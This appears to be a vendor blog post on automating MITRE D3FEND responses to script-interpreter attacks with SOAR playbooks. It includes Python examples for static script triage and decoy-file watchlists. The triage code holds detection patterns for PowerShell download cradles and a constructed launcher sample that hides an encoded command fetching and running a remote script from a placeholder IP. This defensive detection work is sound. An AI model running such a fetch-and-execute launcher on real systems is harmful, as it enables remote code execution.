Command and Scripting Interpreter attacks were the second most common technique seen in MITRE Engenuity's Sightings Ecosystem report, representing 15.77% of 1.1 million sightings. MITRE's D3FEND matrix outlines how to address this technique; however, security teams struggle to consistently implement D3FEND's recommendations.
This blog demonstrates how Security Orchestration, Automation, and Response (SOAR) can be used to consistently implement each stage of the D3FEND framework.
The Command and Scripting Interpreter technique (ATT&CK ID T1059) refers to the abuse of command and script interpreters to execute malicious commands on a targeted system. Interfaces such as PowerShell, Bash, or the Windows Command Prompt provide a direct means to interact with the underlying system, allowing users to execute commands and scripts to perform legitimate administrative tasks. These interpreters ship by default on nearly every workstation and server, and their constant legitimate use makes malicious activity hard to distinguish from routine administration, which makes them attractive targets.
The MITRE D3FEND Matrix has six stages: model, harden, detect, isolate, deceive, and evict. Each has different tasks that can be completed to address T1059. In the examples below, I will show you how Smart SOAR playbooks can turn D3FEND’s recommendations into automated workflows.
D3FEND Recommendation: Asset Vulnerability Enumeration. In stage one (Model), MITRE recommends enumerating the vulnerabilities on affected devices, typically by running a vulnerability scan against them. This is possible in Smart SOAR using one of our many integrations. For example, Qualys Vulnerability Management can be used to:
D3FEND Recommendation: Local File Permissions. Once a compromised account has been confirmed, restricting what that account can reach is the next stage (Harden) of the D3FEND framework. An identity and access management tool can be used to review the user's permissions and group memberships and to cut off access to files, applications, or devices by removing the user from the groups that grant it or suspending the account outright. In this example we use Okta to execute these tasks.
D3FEND Recommendation: File Analysis. In stage three (Detect), MITRE recommends a detailed analysis of the suspect file, including dynamic analysis, emulated file analysis, and static inspection of the file's content and hash. Many security tools have this capability. For example, CrowdStrike can be used to submit files to a sandbox environment and review the results of the report directly within Smart SOAR. The commands include:
D3FEND Recommendation: Executable Allow/Denylisting. If a malicious file is found to be running on a device, the next action a security team needs to take is to add the executable it launched, normally identified by its SHA-256 hash, to the denylist so the EDR blocks it everywhere. Conversely, if the executables are found to be benign and the alert was a false positive, they can be added to an allowlist to eliminate future false positives. Only allowlist after an analyst has confirmed the verdict: an automatic allowlist entry on a file the sandbox merely failed to flag would hand the adversary a permanent bypass.
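The following is an added example, written for this page, of the static half of the Detect stage above feeding the allow/denylist decision; it is not Smart SOAR, D3FEND, or CrowdStrike code. It triages a script artefact the way a playbook step might before (or alongside) sandbox submission: it hashes the content, decodes any `-EncodedCommand` blob (PowerShell accepts `-e`, `-ec`, `-enc` and similar prefixes), runs a handful of content rules for common T1059.001 tradecraft, and maps the verdict to a list entry. The rules, the two-indicator threshold for "malicious", and the generic `type`/`value`/`action` entry fields are assumptions for the demonstration; a real EDR integration defines its own schema. The sample scripts are constructed, not taken from any incident.

```python
"""Static triage of a script artefact ahead of the allow/denylist decision.

Added example, not Smart SOAR, D3FEND, or CrowdStrike code. Sample scripts,
content rules, thresholds and list-entry fields are all assumptions.
"""
import base64
import hashlib
import re
from typing import Dict, List, Optional

# PowerShell treats -e, -ec, -en, -enc ... as prefixes of -EncodedCommand.
# The \b stops -ExecutionPolicy and -ErrorAction from matching.
ENCODED_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]{8,})", re.I)

# Content rules (assumed for this example) for common T1059.001 tradecraft.
CONTENT_RULES = {
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "execution_policy_bypass": re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.I),
    "hidden_window": re.compile(r"-(?:WindowStyle|w)\s+Hidden", re.I),
}


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind a -EncodedCommand blob, or None."""
    m = ENCODED_FLAG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64 / UTF-16LE: leave it to the sandbox


def analyze_script(content: bytes) -> Dict[str, object]:
    """Hash the artefact and run the content rules over it and any decoded payload."""
    text = content.decode("utf-8", errors="replace")
    decoded = decode_encoded_command(text)
    scope = text if decoded is None else text + "\n" + decoded
    indicators: List[str] = [name for name, rule in CONTENT_RULES.items() if rule.search(scope)]
    if decoded is not None:
        indicators.append("encoded_command")
    indicators.sort()
    if len(indicators) >= 2:
        verdict = "malicious"
    elif indicators:
        verdict = "suspicious"  # hold for the sandbox report and analyst review
    else:
        verdict = "benign"
    return {
        "sha256": hashlib.sha256(content).hexdigest(),
        "decoded": decoded,
        "indicators": indicators,
        "verdict": verdict,
    }


def list_entry(result: Dict[str, object], analyst_confirmed: bool = False) -> Optional[Dict[str, str]]:
    """Map a verdict to an allow/denylist entry; allowlisting needs a human sign-off."""
    verdict = result["verdict"]
    if verdict == "malicious":
        action = "deny"
    elif verdict == "benign" and analyst_confirmed:
        action = "allow"
    else:
        return None  # nothing is listed automatically for suspicious or unconfirmed files
    return {"type": "sha256", "value": str(result["sha256"]), "action": action}


# Constructed samples: a launcher hiding a download cradle, and a routine backup script.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2.ps1')"
MALICIOUS_BAT = (
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -enc "
    + base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
).encode()
BENIGN_PS1 = b"Get-ChildItem C:\\Logs -Filter *.log | Compress-Archive -DestinationPath D:\\Backup\\logs.zip\n"

if __name__ == "__main__":
    for sample in (MALICIOUS_BAT, BENIGN_PS1):
        result = analyze_script(sample)
        print(result["verdict"], result["indicators"], list_entry(result))
```

The decoded payload is scanned together with the launcher text, so a cradle hidden behind `-enc` still trips the same rules as one written in the clear; a playbook would attach the decoded text to the case so the analyst does not have to decode it by hand.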
D3FEND Recommendation: Decoy File. In the Deceive stage, playbooks can create new files and add their hashes to an EDR's watchlist so that any interaction with the file is flagged. Because a decoy has no legitimate use, any access to it is a high-confidence signal. This lets security teams trick an adversary, observe their actions, and ultimately remove them from the network.
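As an added example (not Smart SOAR or any EDR vendor's code), the block below shows the two halves of the decoy-file step above: deploying decoys with per-host unique content, so that each file's SHA-256 can be pushed to a watchlist, and a scheduled integrity sweep that reports a decoy that has been modified or deleted. The decoy names, the watchlist record layout, and the `run_demo` helper that simulates tampering are assumptions made for this demonstration; in production the hashes go to the EDR, which raises the alert when the hash is read, copied, or appears on another host.

```python
"""Decoy files with a hash watchlist (D3FEND Decoy File).

Added example, not Smart SOAR or any EDR vendor's code. Decoy names, the
watchlist layout and the tampering demo are assumptions.
"""
import hashlib
import secrets
import tempfile
from pathlib import Path
from typing import Dict, List

# Names that look worth stealing. Real users never touch them, so any access is signal.
DECOY_NAMES = ["passwords.xlsx", "vpn_backup_codes.txt", "aws_keys.csv"]


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def deploy_decoys(directory: Path, names: List[str] = DECOY_NAMES) -> List[Dict[str, str]]:
    """Write decoys with unique content and return the watchlist entries for the EDR."""
    directory.mkdir(parents=True, exist_ok=True)
    watchlist: List[Dict[str, str]] = []
    for name in names:
        path = directory / name
        # Plausible-looking rows with random secrets: the hash is unique per host, so it
        # cannot be guessed, and a match on another host proves the file was exfiltrated.
        content = (
            "account,secret\n"
            f"svc_backup,{secrets.token_hex(12)}\n"
            f"svc_deploy,{secrets.token_hex(12)}\n"
        ).encode()
        path.write_bytes(content)
        watchlist.append({"path": str(path), "sha256": sha256_of(path), "tag": "decoy"})
    return watchlist


def check_decoys(watchlist: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Scheduled sweep: report decoys that were deleted or whose content changed."""
    alerts: List[Dict[str, str]] = []
    for entry in watchlist:
        path = Path(entry["path"])
        if not path.exists():
            alerts.append({"path": entry["path"], "event": "deleted"})
        elif sha256_of(path) != entry["sha256"]:
            alerts.append({"path": entry["path"], "event": "modified"})
    return alerts


def run_demo() -> Dict[str, object]:
    """Deploy decoys in a temp dir, sweep, then simulate tampering and sweep again."""
    root = Path(tempfile.mkdtemp(prefix="decoys-"))
    watchlist = deploy_decoys(root)
    clean_sweep = check_decoys(watchlist)
    Path(watchlist[0]["path"]).write_bytes(b"attacker overwrote me")  # simulated tampering
    Path(watchlist[1]["path"]).unlink()                                # simulated deletion
    return {"watchlist": watchlist, "clean_sweep": clean_sweep, "after_tamper": check_decoys(watchlist)}


if __name__ == "__main__":
    demo = run_demo()
    for entry in demo["watchlist"]:
        print("watch", entry["sha256"], entry["path"])
    print("alerts:", demo["after_tamper"])
```

Hashing on its own cannot tell you that a decoy was merely read; that is why the hash goes to the EDR, where file-open and file-copy telemetry can be matched against it.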
D3FEND Recommendation: File Removal. The final stage of the D3FEND framework is Evict. For Command and Scripting Interpreter threats, this means removing the malicious script or executable from affected hosts. CrowdStrike's Delete IOCs command is one integration command used at this stage. One caveat: Delete IOCs removes indicator entries from the Falcon custom IOC list rather than deleting the file on disk, so a playbook that needs the file gone from the host should pair it with a Real Time Response file-deletion command (such as rm) and then confirm removal by re-checking the hash on the device.
MITRE D3FEND is a reliable framework; however, it is difficult to implement consistently because of its detailed nature. Without an automated workflow, it is easy for teams to miss crucial steps in the incident response process. By building playbooks inside of Smart SOAR that are directly in line with MITRE D3FEND best practices, security teams can follow the right process every time.